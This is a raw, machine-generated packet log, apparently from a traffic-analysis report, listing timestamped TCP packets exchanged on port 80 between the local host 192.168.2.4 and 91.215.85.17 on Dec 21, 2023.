                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.927969933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928226948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928241014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928359032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928371906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928400040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928534031 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928560972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928632021 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928658009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928694010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928699970 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928755999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928797007 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928850889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928960085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.928999901 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929032087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929080009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929191113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929241896 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929296017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929348946 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929388046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929445982 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929465055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929488897 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929536104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929630041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929642916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929722071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929819107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929883003 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.929981947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930046082 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930094004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930161953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930228949 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930362940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930381060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930440903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930505037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930558920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930697918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930845022 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930902004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.930958986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931030035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931107998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931154013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931298018 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931310892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931427956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931444883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931526899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931581020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931638002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931715012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931761026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931845903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.931950092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932029009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932095051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932194948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932226896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932300091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932317972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932380915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932523966 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932537079 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932733059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932781935 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932845116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932905912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.932976961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933037043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933108091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933187008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933232069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933357954 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933371067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933420897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933554888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933568954 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933654070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933747053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933837891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933911085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.933947086 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934000015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934102058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934130907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934170961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934170961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934217930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934231997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934261084 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934292078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934364080 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934376955 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934408903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934447050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934487104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934539080 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934638977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934679031 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934691906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934730053 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934771061 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934904099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934942961 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.934981108 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935102940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935142994 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935184956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935249090 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935297966 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935339928 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935405016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935494900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935524940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935534000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935570955 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935609102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935667992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935705900 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935739040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935790062 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935836077 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935837030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935877085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935910940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.935956955 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936007977 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936043978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936081886 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936110973 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936142921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936146975 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936194897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936233997 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936276913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936311007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936348915 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936394930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936480999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936511993 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936553955 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936600924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936682940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936723948 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936805010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936856985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936899900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936944962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.936985016 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937037945 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937110901 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937151909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937206984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937297106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937417030 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937457085 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937496901 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937558889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937599897 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937649965 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937685966 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937731028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937824965 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937869072 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937912941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937927008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937963009 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.937993050 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938024044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938132048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938144922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938174963 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938194990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938433886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938497066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938539028 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938585997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938656092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938694000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938741922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938858032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938869953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938906908 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.938962936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939021111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939059019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939088106 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939122915 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939212084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939377069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939415932 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939419031 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939522028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939559937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939647913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939724922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939774990 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939814091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939861059 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.939960957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940000057 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940048933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940085888 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940125942 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940201998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940237999 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940283060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940356016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940392971 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940439939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940466881 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940550089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940584898 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940624952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940661907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940700054 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940735102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940771103 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940804005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940862894 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940898895 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.940944910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941004038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941042900 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941090107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941108942 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941246986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941263914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941284895 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941303015 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941348076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941437006 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941477060 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941658974 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941673040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941719055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941746950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941838026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941895008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.941940069 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942001104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942071915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942111969 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942265034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942276955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942305088 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.942333937 CET804973891.215.85.17192.168.2.4
